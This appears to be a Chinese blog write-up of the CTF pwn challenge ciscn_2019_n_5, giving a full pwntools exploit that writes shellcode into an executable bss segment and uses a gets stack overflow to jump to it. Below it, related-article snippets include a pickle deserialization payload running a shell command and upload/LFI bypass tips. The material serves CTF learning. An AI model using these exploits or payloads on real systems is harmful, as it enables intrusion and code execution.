ciscn_2019_n_5

CISCN_2019_N_5漏洞分析
最新推荐文章于 2025-02-15 13:30:44 发布
原创 最新推荐文章于 2025-02-15 13:30:44 发布 · 448 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#pwn #CTF #WriteUp #python #网络安全

本文介绍CISCN_2019_N_5题目的解决思路,通过关闭所有保护机制并利用bss段可写可执行特性,构造shellcode并利用栈溢出技巧获取shell权限。

ciscn_2019_n_5

使用checksec查看:
在这里插入图片描述
保护都关闭的状态。

放进IDA中分析:
在这里插入图片描述

  • read(0, name, 0x64uLL); :往变量name中写入数据,name在bss段上。地址为:0x601080
  • gets(text, name);:存在栈溢出。

题目思路

  • 保护全关,且bss段可写可执行。
  • 把shellcode写入bss段上。
  • 通过栈溢出跳到shellcode处执行getshell。

步骤解析

无需

完整exp

from pwn import *

#start
r = remote("node4.buuoj.cn",27504)
# r = process("../buu/ciscn_2019_n_5")
context(arch='amd64',os='linux')

#params
flag_addr = 0x601080
shellcode = asm(shellcraft.sh())

#attack
payload = b'M'*(0x20+8) + p64(0x601080)
r.recvline()
r.sendline(shellcode)
r.recvline()
r.recvline()
r.sendline(payload)

r.interactive()
[buuctf]ciscn_2019_n_5
逆向萌新的博客
07-03 1151
[buuctf]ciscn_2019_n_5
buuctf_ciscn_2019_n_5
2301_81060697的博客
02-20 423
buuctf
CTFciscn_2019_n_5
凉水的博客
04-22 1139
题目分析 1 反编译,寻找可以利用的地方 main函数的反编译结果如下: int main(void) { 1 char text [30]; 2 setvbuf(stdout,(char *)0x0,2,0); 3 puts("tell me your name"); 4 read(0,name,100); 5 puts("wow~ nice name!"); 6 puts("What do you want to say to me?"); 7 gets(text);
ciscn_2019_n_5解题
2301_81504456的博客
07-14 1079
linux系统命令和理解好程序运行流程。
ciscn_2019_n_3
12-30
ciscn(全国大学生信息安全竞赛),2019年的一道题目,涉及到fastbin堆漏洞的利用。由于调用了system函数,所以漏洞利用的难度不大,推荐初学者练习。题解链接:...
BUUCTF ciscn_2019_n_5
红叶的博客
10-31 1942
通过 puts 函数泄露真实地址,通过LibcSearcher查询Libc中后3位相同的Libc,dump并计算出 system 、 /bin/sh 的偏移。但是有个问题,如果本地打不进去可以尝试更换系统打,我的Kali打不进去换了个Ubuntu进去了。既然没开NX,那代表栈是可执行的,只需要构造shellcode即可直接获取shell。Payload_Name --- 用来跳过第一步的输入 name。Payload_Leak --- 用来进行溢出并获取地址。完全是裸的程序,基本上一点保护都没开。
【BUUCTFPWNciscn_2019_n_5 shellcode
m0_55368674的博客
01-13 630
【BUUCTFPWNciscn_2019_n_5题解
BUU-ciscn_2019_n_5
qq_45771413的博客
04-27 867
查看保护 什么都没保护.jpg IDA 逻辑很简单,两次输入。这两次输入看起来都可以利用: read限制了读取长度,而且name是全局变量,地址可访问。 gets里的text可以进行栈溢出,0x20 解题思路 EXP from pwn import * p=remote('node3.buuoj.cn',29048) context.arch = 'amd64' # 架构名称,不加狂报错…… context.log_level = 'debug' # debug模式 shellcode = asm(s
[BUUCTF-pwn]——ciscn_2019_n_5
Y_peak的博客
02-11 906
[BUUCTF-pwn]——ciscn_2019_n_5 题目地址: https://buuoj.cn/challenges#ciscn_2019_n_5 老规矩还是先checksec 一下看看,64位的什么保护都没开.感觉应该要自己写shellcode了 在IDA中一看,果然如此.将准备好的shellcode 通过read写入 name . 然后通过gets进行栈溢出,使其,返回至name所在位置即可. shellcraft是pwntools中的一个模块是shellcode的生成器 所以shell
Buuctf(pwn) ciscn_2019_n_5
半岛铁盒的博客
03-30 436
发现name在全局变量bss段上 可以利用 gets() 进行溢出 from pwn import* r=remote('node3.buuoj.cn',27785) context(arch='amd64',os='linux') 说明版本架构 shellcode=asm(shellcraft.sh()) 获取生成调用 bin/sh的 shellcode r.sendlineafter('tell me your name',shellcode) 往name里面写入shellcod...
BUUCTF 刷题 ciscn_2019_n_5
Helloity的博客
02-09 3330
先附上题目:BUUCTF在线评测 放到我们的虚拟机上checksec一下,64位程序,拥有RWX段。 Arch: amd64-64-little RELRO: Partial RELRO Stack: No canary found NX: NX disabled PIE: No PIE (0x400000) RWX: Has RWX segments 接下来放到IDA里f5一下,可以看到主函数读
PWN刷题记录(1)--ciscn_2019_n_5
小心信科理化声
05-10 412
这是第一篇的刷题记录,从ret2text开始刷起 0x1 程序分析 先checksec 一下 64位的小端序,NX没开启,妥妥的写shellcode 拖入IDA中查看一下 main函数如下 可以看到gets(text)有明显的溢出 然后还可以看到关键的read函数,可以做libc泄露用,先留着 然后查找一下有没有能用到的system函数和binsh 无system函数 估计也没有binsh了 咋办呢>? 看一下有没有可读可写可执行的字段呢? 看看这里的两个变量:name\text 存在!
buuctf ciscn_2019_n_5
qq_53912227的博客
02-15 260
发现有个name的全局变量(bss),这个时候就想到用ret2shellcode,但是实际上是不行的,因为这个name的bss不具有x权限。shift+f12发现没有system和binsh等字符串,因此就需要用到ret2libc,这里的puts正好提前被使用了。发现NX unknown(想到了ret2shellcode)这个时候就可以确定ret2shellcode不行。开局:典型的ret2libc,老规矩,file 文件。
[BUUCTF]PWN20——ciscn_2019_n_5
mcmuyanga的博客
09-07 2012
[BUUCTF]PWN20——ciscn_2019_n_5 附件 步骤: 例行检查,64位,没有开启任何保护 试运行一下程序,看看程序的执行情况 64位ida载入,找到main函数, 逻辑很简单,第一次让我们输入名字,限制输入长度为0x64,看一下name参数,发现name在全局变量bss段上 第二次输入利用gets,没有限制长度,可以对v4造成溢出 利用过程 利用第一个输入点,往name参数里写入shellcode context(arch='amd64',os='linux')
ciscn_2019_n_8
最新发布
03-24
### 关于CISCN 2019 N8题目的解析 在全国大学生信息安全竞赛(CISCN)中,Web方向的题目通常涉及漏洞利用、文件包含、反序列化攻击等内容。对于CISCN 2019中的N8题目,其核心考点可能围绕PHP反序列化漏洞展开。 #### PHP反序列化漏洞分析 在CISCN 2019 Web1题目中提到的内容表明,该赛事的部分题目设计基于PHP对象反序列化的特性[^2]。具体到N8题目,可能存在类似的机制: - **Payload构造**:通过精心构造的对象结构触发特定逻辑路径,实现任意文件读取或其他敏感操作。 - **关键点提示**:根据已有资料,在某些情况下需要调整`Handle`类的相关属性来适配目标环境的要求[^5]。 以下是针对此类问题的一个通用解决思路及其Python脚本示例用于生成payload: ```python import pickle class Exploit(object): def __reduce__(self): import os command = 'cat /flag' # 假设我们需要执行命令获取flag return (os.system, (command,)) def serialize_exploit(): serialized_data = pickle.dumps(Exploit()) with open('exploit_payload', 'wb') as f: f.write(serialized_data) serialize_exploit() ``` 需要注意的是上述代码仅为演示如何创建一个简单的pickle反序列化攻击向量,并不适用于实际比赛场景下的PHP应用;真正的解决方案需依据具体的程序行为模式定制相应的php序列化字符串形式的数据包提交给服务器端处理以达成预期效果。 #### 文件上传与包含技巧 如果N8还涉及到文件上传功能,则可以尝试以下方法绕过检测并植入恶意脚本: - 利用MIME类型校验不足上传图片马; - 结合LFI(Local File Inclusion)缺陷访问已上载至服务器上的特制图像文件完成进一步渗透活动。 综上所述,解答这类综合性较强的CTF赛题不仅考验选手们的技术功底同时也对其创造力提出了较高要求。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值